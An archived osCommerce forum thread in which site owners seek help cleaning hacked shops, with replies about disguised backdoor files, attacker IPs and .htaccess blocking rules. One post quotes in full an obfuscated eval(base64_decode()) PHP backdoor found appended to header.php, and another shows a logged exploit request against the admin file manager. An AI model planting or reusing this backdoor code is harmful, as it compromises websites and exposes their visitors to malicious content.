Jump to content

Archived

This topic is now archived and is closed to further replies.

Lary_an

VIRUS on my site - PLEASE HELP

Recommended Posts

Hi,

 

I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on linux and the host does not assist in virus removal. The host suggested i download the whole site check it for viruses and upload it back up. The problem is when i do that using the latest version of NORTON i get a clean run - no viruses.

 

I checked every single file as much as i could to see if there is an updated code and didn't find any. The only thing i see which i don't think i had before is a new folder named www with a full copy of my site which looks like is being updated as soon as i update my regular site directory. i was wondering if this can be the cause of my problems.

 

PLEASE HELP!!!!

 

any advice would be greatly appreciated!!!!!

 

P.S. Just got a message from my host that www folder is a virtual folder and i shouldn't worry about it!

Share this post


Link to post
Share on other sites

Norton does not check for malicious code in source of web pages.

 

If you install site monitor on your site that normally shows "most" of the files that need cleansing.

 

You could also read a few threads on hacked sites which discuss infected file in image and other directories.

 

HTH

 

G


Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

Hi,

 

I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on linux and the host does not assist in virus removal. The host suggested i download the whole site check it for viruses and upload it back up. The problem is when i do that using the latest version of NORTON i get a clean run - no viruses.

 

I checked every single file as much as i could to see if there is an updated code and didn't find any. The only thing i see which i don't think i had before is a new folder named www with a full copy of my site which looks like is being updated as soon as i update my regular site directory. i was wondering if this can be the cause of my problems.

 

PLEASE HELP!!!!

 

any advice would be greatly appreciated!!!!!

 

P.S. Just got a message from my host that www folder is a virtual folder and i shouldn't worry about it!

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

 

There is a suspicious file in your root folder:

 

cookie_setup.php

 

I've seen it before.

 

It's normally a hack file.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

 

There is a suspicious file in your root folder:

 

cookie_setup.php

 

I've seen it before.

 

It's normally a hack file.

 

Jim,

 

THANK YOU!!!!! THANK YOU!!!! THANK YOU!!!!!

 

This was it!

Everything works now and we are working on making the site more secure... We were not aware before of any AddOns that we could use (not good when you are a beginner and don't ask the right questions).

 

thanks again!

Share this post


Link to post
Share on other sites

I need urgent help... Please...

my website of recently hacked, I restored the website, godaddy.com removed some infected script file, google lifted the ban, but recently when I go to website which is divineaccessories.com it tries to download something and my norton picks up as intrusion attack High risk by 91.204.48.52, 80, attaker 4141.in/cvyukfmcuhnhvb.jar or 2727.in/xxxxxxxx

please please advice, as I am not getting any traffic to my website, which is a decent website but not getting any traffic probably due to virus

Share this post


Link to post
Share on other sites

Unfortunately I have the same issue. :angry: :blush: :(

 

With site monitor I found they left the following at the end of the file catalog/includes/header.php

 

<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>

 

When I installed my clean backup, it was back within 10 minutes, seems like they used some kind of bot.

 

When I took my site off line for a day and then tried again, it did not come back. Of course I did various things to increase my sites security, but I'm not sure if I solved the issue and that they won't be back.

 

So if anyone can translate the above for me or has some specific directions I would appreciate it.

Share this post


Link to post
Share on other sites

The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website.

 

Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website.

 

Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate.

 

 

 

Chris

 

Yep, found some of those, and some fake php files too. Further I discovered some visits from a Russian IP 91/213/174/123

Share this post


Link to post
Share on other sites

Yep, found some of those, and some fake php files too. Further I discovered some visits from a Russian IP 91/213/174/123

 

That single IP must be responsible for a lot of altered osC installations. I lost count the number of times it's been seen in my Apache logs now. Sadly Russian ISP's probably couldnt care less, so I block the whole country myself.

Share this post


Link to post
Share on other sites

He's tried today, wondered how much longer before he'd be back.

 

Awwww he got a 403 poor soul!

 

91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

Share this post


Link to post
Share on other sites

That single IP must be responsible for a lot of altered osC installations. I lost count the number of times it's been seen in my Apache logs now. Sadly Russian ISP's probably couldnt care less, so I block the whole country myself.

My .htaccess file that is blocking countries is about 9mb long...


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

My .htaccess file that is blocking countries is about 9mb long...

 

I don't go to quite that extent. Mines about 250kb with the main problematic countries in it.

 

Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifially set up to scan other sites for vulnerabilites.

 

http://www.theta.tk/wiki/ZmEu

Share this post


Link to post
Share on other sites

I don't go to quite that extent. Mines about 250kb with the main problematic countries in it.

 

Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifially set up to scan other sites for vulnerabilites.

 

http://www.theta.tk/wiki/ZmEu

 

Exactly how do you block the ZmEu script Wayne? Do I just need to add RewriteCond %(HTTP_USER_AGENT) ^ZmEu [OR] to my list of blocked bots?

 

I was thinking, wouldn't it be a good idea to start a thread with an :devil: OSCOMMERCE HATE LIST? :devil: We could collect IP's of all known Oscommerce hackers and use it in the IP trap or in .htaccess. Similar for the bad bots, allthough the IPtrap has allready got a nice collection.

 

:wub:

Share this post


Link to post
Share on other sites

Exactly how do you block the ZmEu script Wayne? Do I just need to add RewriteCond %(HTTP_USER_AGENT) ^ZmEu [OR] to my list of blocked bots?

 

I was thinking, wouldn't it be a good idea to start a thread with an :devil: OSCOMMERCE HATE LIST? :devil: We could collect IP's of all known Oscommerce hackers and use it in the IP trap or in .htaccess. Similar for the bad bots, allthough the IPtrap has allready got a nice collection.

 

:wub:

 

I think I have

 

RewriteCond %{HTTP_USER_AGENT} ^(.*)ZmEu(.*) [OR]

 

Of course they can probably use any useragent they like, but most are basically lazy and dont bother. I think I have also seen the same thing visit as "Morpheous strikes again"

 

Well there are certainly many IP's that seem to visit many sites again and again.

 

It would not suprise me if they visit this forum quite a lot too! I wonder if any are registered users!

 

 

Wayne....

Share this post


Link to post
Share on other sites

×